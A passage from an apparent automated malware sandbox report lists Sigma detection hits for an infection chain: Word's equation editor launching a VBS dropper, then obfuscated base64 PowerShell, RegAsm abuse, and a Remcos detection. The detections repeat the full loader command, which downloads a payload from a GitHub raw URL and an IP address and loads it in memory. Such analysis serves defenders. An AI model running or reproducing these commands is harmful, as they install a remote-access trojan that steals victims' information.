{0}'+'RegAs'+'m{0}'+', {'+'0'+'}'+'{'+'0},{0}{0'+'})') -f [ChAr]34,[ChAr]39,[ChAr]36))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( ([StrInG]$veRbosEPREfeRENCE)[1,3]+'X'-Join'') ((('{2}'+'ur'+'l'+' = {'+'1}'+'ht'+'t'+'p'+'s://'+'r'+'a'+'w.gith'+'ubusercontent.'+'c'+'om/N'+'oDetectO'+'n/'+'N'+'oDete'+'c'+'tOn/'+'r'+'efs'+'/heads/ma'+'in/'+'Deta'+'hNoth-'+'V.t'+'xt{1}; {2}base'+'64Content = (New-Ob'+'ject System'+'.'+'Net.W'+'ebClient).Do'+'wnloadStri'+'ng({2}url);'+' {2'+'}binar'+'yContent = [System.'+'Conve'+'rt]::Fr'+'omBa'+'se64S'+'t'+'ring({2}base64Conte'+'nt); {2}assembly = '+'[Refle'+'ctio'+'n.Assembly]::L'+'oad({2'+'}bi'+'na'+'r'+'yC'+'onte'+'nt); ['+'dnl'+'ib.'+'IO.'+'Hom'+'e]::'+'V'+'AI'+'('+'{0}tx'+'t.C'+'FDR'+'RW/'+'08/771.6'+'9.431.19//:pt'+'th{0}, {0}desativ'+'ado{'+'0}'+', {0}desa'+'tivado{'+'0},'+' {0}desativ'+'ado{0'+'}, {0}'+'RegAs'+'m{0}'+', {'+'0'+'}'+'{'+'0},{0}{0'+'})') -f [ChAr]34,[ChAr]39,[ChAr]36))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggKFtTdHJJbkddJHZlUmJvc0VQUkVmZVJFTkNFKVsxLDNdKydYJy1Kb2luJycpICgoKCd7Mn0nKyd1cicrJ2wnKycgPSB7JysnMX0nKydodCcrJ3QnKydwJysnczovLycrJ3InKydhJysndy5naXRoJysndWJ1c2VyY29udGVudC4nKydjJysnb20vTicrJ29EZXRlY3RPJysnbi8nKydOJysnb0RldGUnKydjJysndE9uLycrJ3InKydlZnMnKycvaGVhZHMvbWEnKydpbi8nKydEZXRhJysnaE5vdGgtJysnVi50JysneHR7MX07IHsyfWJhc2UnKyc2NENvbnRlbnQgPSAoTmV3LU9iJysnamVjdCBTeXN0ZW0nKycuJysnTmV0LlcnKydlYkNsaWVudCkuRG8nKyd3bmxvYWRTdHJpJysnbmcoezJ9dXJsKTsnKycgezInKyd9YmluYXInKyd5Q29udGVudCA9IFtTeXN0ZW0uJysnQ29udmUnKydydF06OkZyJysnb21CYScrJ3NlNjRTJysndCcrJ3JpbmcoezJ9YmFzZTY0Q29udGUnKydudCk7IHsyfWFzc2VtYmx5ID0gJysnW1JlZmxlJysnY3RpbycrJ24uQXNzZW1ibHldOjpMJysnb2FkKHsyJysnfWJpJysnbmEnKydyJysneUMnKydvbnRlJysnbnQpOyBbJysnZG5sJysnaWIuJysnSU8uJysnSG9
                  Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggKFtTdHJJbkddJHZlUmJvc0VQUkVmZVJFTkNFKVsxLDNdKydYJy1Kb2luJycpICgoKCd7Mn0nKyd1cicrJ2wnKycgPSB7JysnMX0nKydodCcrJ3QnKydwJysnczovLycrJ3InKydhJysndy5naXRoJysndWJ1c2VyY29udGVudC4nKydjJysnb20vTicrJ29EZXRlY3RPJysnbi8nKydOJysnb0RldGUnKydjJysndE9uLycrJ3InKydlZnMnKycvaGVhZHMvbWEnKydpbi8nKydEZXRhJysnaE5vdGgtJysnVi50JysneHR7MX07IHsyfWJhc2UnKyc2NENvbnRlbnQgPSAoTmV3LU9iJysnamVjdCBTeXN0ZW0nKycuJysnTmV0LlcnKydlYkNsaWVudCkuRG8nKyd3bmxvYWRTdHJpJysnbmcoezJ9dXJsKTsnKycgezInKyd9YmluYXInKyd5Q29udGVudCA9IFtTeXN0ZW0uJysnQ29udmUnKydydF06OkZyJysnb21CYScrJ3NlNjRTJysndCcrJ3JpbmcoezJ9YmFzZTY0Q29udGUnKydudCk7IHsyfWFzc2VtYmx5ID0gJysnW1JlZmxlJysnY3RpbycrJ24uQXNzZW1ibHldOjpMJysnb2FkKHsyJysnfWJpJysnbmEnKydyJysneUMnKydvbnRlJysnbnQpOyBbJysnZG5sJysnaWIuJysnSU8uJysnSG9tJysnZV06OicrJ1YnKydBSScrJygnKyd7MH10eCcrJ3QuQycrJ0ZEUicrJ1JXLycrJzA4Lzc3MS42JysnOS40MzEuMTkvLzpwdCcrJ3RoezB9LCB7MH1kZXNhdGl2JysnYWRveycrJzB9JysnLCB7MH1kZXNhJysndGl2YWRveycrJzB9LCcrJyB7MH1kZXNhdGl2JysnYWRvezAnKyd9LCB7MH0nKydSZWdBcycrJ217MH0nKycsIHsnKycwJysnfScrJ3snKycwfSx7MH17MCcrJ30pJykgLWYgIFtDaEFyXTM0LFtDaEFyXTM5LFtDaEFyXTM2KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggKFtTdHJJbkddJHZlUmJvc0VQUkVmZVJFTkNFKVsxLDNdKydYJy1Kb2luJycpICgoKCd7Mn0nKyd1cicrJ2wnKycgPSB7JysnMX0nKydodCcrJ3QnKydwJysnczovLycrJ3InKydhJysndy5naXRoJysndWJ1c2VyY29udGVudC4nKydjJysnb20vTicrJ29EZXRlY3RPJysnbi8nKydOJysnb0RldGUnKydjJysndE9uLycrJ3InKydlZnMnKycvaGVhZHMvbWEnKydpbi8nKydEZXRhJysnaE5vdGgtJysnVi50JysneHR7MX07IHsyfWJhc2UnKyc2NENvbnRlbnQgPSAoTmV3LU9iJysnamVjdCBTeXN0ZW0nKycuJysnTmV0LlcnKydlYkNsaWVudCkuRG8nKyd3bmxvYWRTdHJpJysnbmcoezJ9dXJsKTsnKycgezInKyd9YmluYXInKyd5Q29udGVudCA9IFtTeXN0ZW0uJysnQ29udmUnKydydF06OkZyJysnb21CYScrJ3NlNjRTJysndCcrJ3JpbmcoezJ9YmFzZTY0Q29udGUnKydudCk7IHsyfWFzc2VtYmx5ID0gJysnW1JlZmxlJysnY3RpbycrJ24uQXNzZW1ibHldOjpMJysnb2FkKHsyJysnfWJpJysnbmEnKydyJysneUMnKydvbnRlJysnbnQpOyBbJysnZG5sJysnaWIuJysnSU8uJysnSG9tJysnZV06OicrJ1YnKydBSScrJygnKyd7MH10eCcrJ3QuQycrJ0ZEUicrJ1JXLycrJzA4Lzc3MS42JysnOS40MzEuMTkvLzpwdCcrJ3RoezB9LCB7MH1kZXNhdGl2JysnYWRveycrJzB9JysnLCB7MH1kZXNhJysndGl2YWRveycrJzB9LCcrJyB7MH1kZXNhdGl2JysnYWRvezAnKyd9LCB7MH0nKydSZWdBcycrJ217MH0nKycsIHsnKycwJysnfScrJ3snKycwfSx7MH17MCcrJ30pJykgLWYgIFtDaEFyXTM0LFtDaEFyXTM5LFtDaEFyXTM2KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine|base64offset|contains: &, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\
                  Sigma detected: Suspicious Microsoft Office Child Process
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithherimagesverygoodforyourhear.Vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithherimagesverygoodforyourhear.Vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3744, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithherimagesverygoodforyourhear.Vbs" , ProcessId: 3816, ProcessName: wscript.exe
                  Sigma detected: WScript or CScript Dropper
                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithherimagesverygoodforyourhear.Vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithherimagesverygoodforyourhear.Vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3744, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithherimagesverygoodforyourhear.Vbs" , ProcessId: 3816, ProcessName: wscript.exe
                  Sigma detected: Change PowerShell Policies to an Insecure Level
                  Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggKFtTdHJJbkddJHZlUmJvc0VQUkVmZVJFTkNFKVsxLDNdKydYJy1Kb2luJycpICgoKCd7Mn0nKyd1cicrJ2wnKycgPSB7JysnMX0nKydodCcrJ3QnKydwJysnczovLycrJ3InKydhJysndy5naXRoJysndWJ1c2VyY29udGVudC4nKydjJysnb20vTicrJ29EZXRlY3RPJysnbi8nKydOJysnb0RldGUnKydjJysndE9uLycrJ3InKydlZnMnKycvaGVhZHMvbWEnKydpbi8nKydEZXRhJysnaE5vdGgtJysnVi50JysneHR7MX07IHsyfWJhc2UnKyc2NENvbnRlbnQgPSAoTmV3LU9iJysnamVjdCBTeXN0ZW0nKycuJysnTmV0LlcnKydlYkNsaWVudCkuRG8nKyd3bmxvYWRTdHJpJysnbmcoezJ9dXJsKTsnKycgezInKyd9YmluYXInKyd5Q29udGVudCA9IFtTeXN0ZW0uJysnQ29udmUnKydydF06OkZyJysnb21CYScrJ3NlNjRTJysndCcrJ3JpbmcoezJ9YmFzZTY0Q29udGUnKydudCk7IHsyfWFzc2VtYmx5ID0gJysnW1JlZmxlJysnY3RpbycrJ24uQXNzZW1ibHldOjpMJysnb2FkKHsyJysnfWJpJysnbmEnKydyJysneUMnKydvbnRlJysnbnQpOyBbJysnZG5sJysnaWIuJysnSU8uJysnSG9tJysnZV06OicrJ1YnKydBSScrJygnKyd7MH10eCcrJ3QuQycrJ0ZEUicrJ1JXLycrJzA4Lzc3MS42JysnOS40MzEuMTkvLzpwdCcrJ3RoezB9LCB7MH1kZXNhdGl2JysnYWRveycrJzB9JysnLCB7MH1kZXNhJysndGl2YWRveycrJzB9LCcrJyB7MH1kZXNhdGl2JysnYWRvezAnKyd9LCB7MH0nKydSZWdBcycrJ217MH0nKycsIHsnKycwJysnfScrJ3snKycwfSx7MH17MCcrJ30pJykgLWYgIFtDaEFyXTM0LFtDaEFyXTM5LFtDaEFyXTM2KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggKFtTdHJJbkddJHZlUmJvc0VQUkVmZVJFTkNFKVsxLDNdKydYJy1Kb2luJycpICgoKCd7Mn0nKyd1cicrJ2wnKycgPSB7JysnMX0nKydodCcrJ3QnKydwJysnczovLycrJ3InKydhJysndy5naXRoJysndWJ1c2VyY29udGVudC4nKydjJysnb20vTicrJ29EZXRlY3RPJysnbi8nKydOJysnb0RldGUnKydjJysndE9uLycrJ3InKydlZnMnKycvaGVhZHMvbWEnKydpbi8nKydEZXRhJysnaE5vdGgtJysnVi50JysneHR7MX07IHsyfWJhc2UnKyc2NENvbnRlbnQgPSAoTmV3LU9iJysnamVjdCBTeXN0ZW0nKycuJysnTmV0LlcnKydlYkNsaWVudCkuRG8nKyd3bmxvYWRTdHJpJysnbmcoezJ9dXJsKTsnKycgezInKyd9YmluYXInKyd5Q29udGVudCA9IFtTeXN0ZW0uJysnQ29udmUnKydydF06OkZyJysnb21CYScrJ3NlNjRTJysndCcrJ3JpbmcoezJ9YmFzZTY0Q29udGUnKydudCk7IHsyfWFzc2VtYmx5ID0gJysnW1JlZmxlJysnY3RpbycrJ24uQXNzZW1ibHldOjpMJysnb2FkKHsyJysnfWJpJysnbmEnKydyJysneUMnKydvbnRlJysnbnQpOyBbJysnZG5sJysnaWIuJysnSU8uJysnSG9tJysnZV06OicrJ1YnKydBSScrJygnKyd7MH10eCcrJ3QuQycrJ0ZEUicrJ1JXLycrJzA4Lzc3MS42JysnOS40MzEuMTkvLzpwdCcrJ3RoezB9LCB7MH1kZXNhdGl2JysnYWRveycrJzB9JysnLCB7MH1kZXNhJysndGl2YWRveycrJzB9LCcrJyB7MH1kZXNhdGl2JysnYWRvezAnKyd9LCB7MH0nKydSZWdBcycrJ217MH0nKycsIHsnKycwJysnfScrJ3snKycwfSx7MH17MCcrJ30pJykgLWYgIFtDaEFyXTM0LFtDaEFyXTM5LFtDaEFyXTM2KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine|base64offset|contains: &, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\
                  Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
                  Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\zdcjgmqajuavikmhtgirxawvvrrtkae", CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\zdcjgmqajuavikmhtgirxawvvrrtkae", CommandLine|base64offset|contains: ^, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentProcessId: 4076, ParentProcessName: RegAsm.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\zdcjgmqajuavikmhtgirxawvvrrtkae", ProcessId: 2736, ProcessName: RegAsm.exe
                  Sigma detected: Suspicious Office Outbound Connections
                  Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49163, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, Initiated: true, ProcessId: 3272, Protocol: tcp, SourceIp: 172.67.216.244, SourceIsIpv6: false, SourcePort: 443
                  Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                  Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithherimagesverygoodforyourhear.Vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithherimagesverygoodforyourhear.Vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3744, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithherimagesverygoodforyourhear.Vbs" , ProcessId: 3816, ProcessName: wscript.exe
                  Sigma detected: Modification of IE Registry Settings
                  Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3272, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                  Sigma detected: Non Interactive PowerShell Process Spawned
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggKFtTdHJJbkddJHZlUmJvc0VQUkVmZVJFTkNFKVsxLDNdKydYJy1Kb2luJycpICgoKCd7Mn0nKyd1cicrJ2wnKycgPSB7JysnMX0nKydodCcrJ3QnKydwJysnczovLycrJ3InKydhJysndy5naXRoJysndWJ1c2VyY29udGVudC4nKydjJysnb20vTicrJ29EZXRlY3RPJysnbi8nKydOJysnb0RldGUnKydjJysndE9uLycrJ3InKydlZnMnKycvaGVhZHMvbWEnKydpbi8nKydEZXRhJysnaE5vdGgtJysnVi50JysneHR7MX07IHsyfWJhc2UnKyc2NENvbnRlbnQgPSAoTmV3LU9iJysnamVjdCBTeXN0ZW0nKycuJysnTmV0LlcnKydlYkNsaWVudCkuRG8nKyd3bmxvYWRTdHJpJysnbmcoezJ9dXJsKTsnKycgezInKyd9YmluYXInKyd5Q29udGVudCA9IFtTeXN0ZW0uJysnQ29udmUnKydydF06OkZyJysnb21CYScrJ3NlNjRTJysndCcrJ3JpbmcoezJ9YmFzZTY0Q29udGUnKydudCk7IHsyfWFzc2VtYmx5ID0gJysnW1JlZmxlJysnY3RpbycrJ24uQXNzZW1ibHldOjpMJysnb2FkKHsyJysnfWJpJysnbmEnKydyJysneUMnKydvbnRlJysnbnQpOyBbJysnZG5sJysnaWIuJysnSU8uJysnSG9tJysnZV06OicrJ1YnKydBSScrJygnKyd7MH10eCcrJ3QuQycrJ0ZEUicrJ1JXLycrJzA4Lzc3MS42JysnOS40MzEuMTkvLzpwdCcrJ3RoezB9LCB7MH1kZXNhdGl2JysnYWRveycrJzB9JysnLCB7MH1kZXNhJysndGl2YWRveycrJzB9LCcrJyB7MH1kZXNhdGl2JysnYWRvezAnKyd9LCB7MH0nKydSZWdBcycrJ217MH0nKycsIHsnKycwJysnfScrJ3snKycwfSx7MH17MCcrJ30pJykgLWYgIFtDaEFyXTM0LFtDaEFyXTM5LFtDaEFyXTM2KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggKFtTdHJJbkddJHZlUmJvc0VQUkVmZVJFTkNFKVsxLDNdKydYJy1Kb2luJycpICgoKCd7Mn0nKyd1cicrJ2wnKycgPSB7JysnMX0nKydodCcrJ3QnKydwJysnczovLycrJ3InKydhJysndy5naXRoJysndWJ1c2VyY29udGVudC4nKydjJysnb20vTicrJ29EZXRlY3RPJysnbi8nKydOJysnb0RldGUnKydjJysndE9uLycrJ3InKydlZnMnKycvaGVhZHMvbWEnKydpbi8nKydEZXRhJysnaE5vdGgtJysnVi50JysneHR7MX07IHsyfWJhc2UnKyc2NENvbnRlbnQgPSAoTmV3LU9iJysnamVjdCBTeXN0ZW0nKycuJysnTmV0LlcnKydlYkNsaWVudCkuRG8nKyd3bmxvYWRTdHJpJysnbmcoezJ9dXJsKTsnKycgezInKyd9YmluYXInKyd5Q29udGVudCA9IFtTeXN0ZW0uJysnQ29udmUnKydydF06OkZyJysnb21CYScrJ3NlNjRTJysndCcrJ3JpbmcoezJ9YmFzZTY0Q29udGUnKydudCk7IHsyfWFzc2VtYmx5ID0gJysnW1JlZmxlJysnY3RpbycrJ24uQXNzZW1ibHldOjpMJysnb2FkKHsyJysnfWJpJysnbmEnKydyJysneUMnKydvbnRlJysnbnQpOyBbJysnZG5sJysnaWIuJysnSU8uJysnSG9tJysnZV06OicrJ1YnKydBSScrJygnKyd7MH10eCcrJ3QuQycrJ0ZEUicrJ1JXLycrJzA4Lzc3MS42JysnOS40MzEuMTkvLzpwdCcrJ3RoezB9LCB7MH1kZXNhdGl2JysnYWRveycrJzB9JysnLCB7MH1kZXNhJysndGl2YWRveycrJzB9LCcrJyB7MH1kZXNhdGl2JysnYWRvezAnKyd9LCB7MH0nKydSZWdBcycrJ217MH0nKycsIHsnKycwJysnfScrJ3snKycwfSx7MH17MCcrJ30pJykgLWYgIFtDaEFyXTM0LFtDaEFyXTM5LFtDaEFyXTM2KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine|base64offset|contains: &, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\
                  Sigma detected: Office Macro File Creation
                  Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3272, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                  Sigma detected: Potential Encoded PowerShell Patterns In CommandLine
                  Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( ([StrInG]$veRbosEPREfeRENCE)[1,3]+'X'-Join'') ((('{2}'+'ur'+'l'+' = {'+'1}'+'ht'+'t'+'p'+'s://'+'r'+'a'+'w.gith'+'ubusercontent.'+'c'+'om/N'+'oDetectO'+'n/'+'N'+'oDete'+'c'+'tOn/'+'r'+'efs'+'/heads/ma'+'in/'+'Deta'+'hNoth-'+'V.t'+'xt{1}; {2}base'+'64Content = (New-Ob'+'ject System'+'.'+'Net.W'+'ebClient).Do'+'wnloadStri'+'ng({2}url);'+' {2'+'}binar'+'yContent = [System.'+'Conve'+'rt]::Fr'+'omBa'+'se64S'+'t'+'ring({2}base64Conte'+'nt); {2}assembly = '+'[Refle'+'ctio'+'n.Assembly]::L'+'oad({2'+'}bi'+'na'+'r'+'yC'+'onte'+'nt); ['+'dnl'+'ib.'+'IO.'+'Hom'+'e]::'+'V'+'AI'+'('+'{0}tx'+'t.C'+'FDR'+'RW/'+'08/771.6'+'9.431.19//:pt'+'th{0}, {0}desativ'+'ado{'+'0}'+', {0}desa'+'tivado{'+'0},'+' {0}desativ'+'ado{0'+'}, {0}'+'RegAs'+'m{0}'+', {'+'0'+'}'+'{'+'0},{0}{0'+'})') -f [ChAr]34,[ChAr]39,[ChAr]36))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( ([StrInG]$veRbosEPREfeRENCE)[1,3]+'X'-Join'') ((('{2}'+'ur'+'l'+' = {'+'1}'+'ht'+'t'+'p'+'s://'+'r'+'a'+'w.gith'+'ubusercontent.'+'c'+'om/N'+'oDetectO'+'n/'+'N'+'oDete'+'c'+'tOn/'+'r'+'efs'+'/heads/ma'+'in/'+'Deta'+'hNoth-'+'V.t'+'xt{1}; {2}base'+'64Content = (New-Ob'+'ject System'+'.'+'Net.W'+'ebClient).Do'+'wnloadStri'+'ng({2}url);'+' {2'+'}binar'+'yContent = [System.'+'Conve'+'rt]::Fr'+'omBa'+'se64S'+'t'+'ring({2}base64Conte'+'nt); {2}assembly = '+'[Refle'+'ctio'+'n.Assembly]::L'+'oad({2'+'}bi'+'na'+'r'+'yC'+'onte'+'nt); ['+'dnl'+'ib.'+'IO.'+'Hom'+'e]::'+'V'+'AI'+'('+'{0}tx'+'t.C'+'FDR'+'RW/'+'08/771.6'+'9.431.19//:pt'+'th{0}, {0}desativ'+'ado{'+'0}'+', {0}desa'+'tivado{'+'0},'+' {0}desativ'+'ado{0'+'}, {0}'+'RegAs'+'m{0}'+', {'+'0'+'}'+'{'+'0},{0}{0'+'})') -f [ChAr]34,[ChAr]39,[ChAr]36))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggKFtTdHJJbkddJHZlUmJvc0VQUkVmZVJFTkNFKVsxLDNdKydYJy1Kb2luJycpICgoKCd7Mn0nKyd1cicrJ2wnKycgPSB7JysnMX0nKydodCcrJ3QnKydwJysnczovLycrJ3InKydhJysndy5naXRoJysndWJ1c2VyY29udGVudC4nKydjJysnb20vTicrJ29EZXRlY3RPJysnbi8nKydOJysnb0RldGUnKydjJysndE9uLycrJ3InKydlZnMnKycvaGVhZHMvbWEnKydpbi8nKydEZXRhJysnaE5vdGgtJysnVi50JysneHR7MX07IHsyfWJhc2UnKyc2NENvbnRlbnQgPSAoTmV3LU9iJysnamVjdCBTeXN0ZW0nKycuJysnTmV0LlcnKydlYkNsaWVudCkuRG8nKyd3bmxvYWRTdHJpJysnbmcoezJ9dXJsKTsnKycgezInKyd9YmluYXInKyd5Q29udGVudCA9IFtTeXN0ZW0uJysnQ29udmUnKydydF06OkZyJysnb21CYScrJ3NlNjRTJysndCcrJ3JpbmcoezJ9YmFzZTY0Q29udGUnKydudCk7IHsyfWFzc2VtYmx5ID0gJysnW1JlZmxlJysnY3RpbycrJ24uQXNzZW1ibHldOjpMJysnb2FkKHsyJysnfWJpJysnbmEnKydyJysneUMnKydvbnRlJysnbnQpOyBbJysnZG5sJysnaWIuJysnSU8uJysnSG9
                  Sigma detected: PowerShell Script Dropped Via PowerShell.EXE
                  Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3864, TargetFilename: C:\Users\user\AppData\Local\Temp\0gqtl14z.fpz.ps1

                  Stealing of Sensitive Information

                  barindex
                  Sigma detected: Remcos
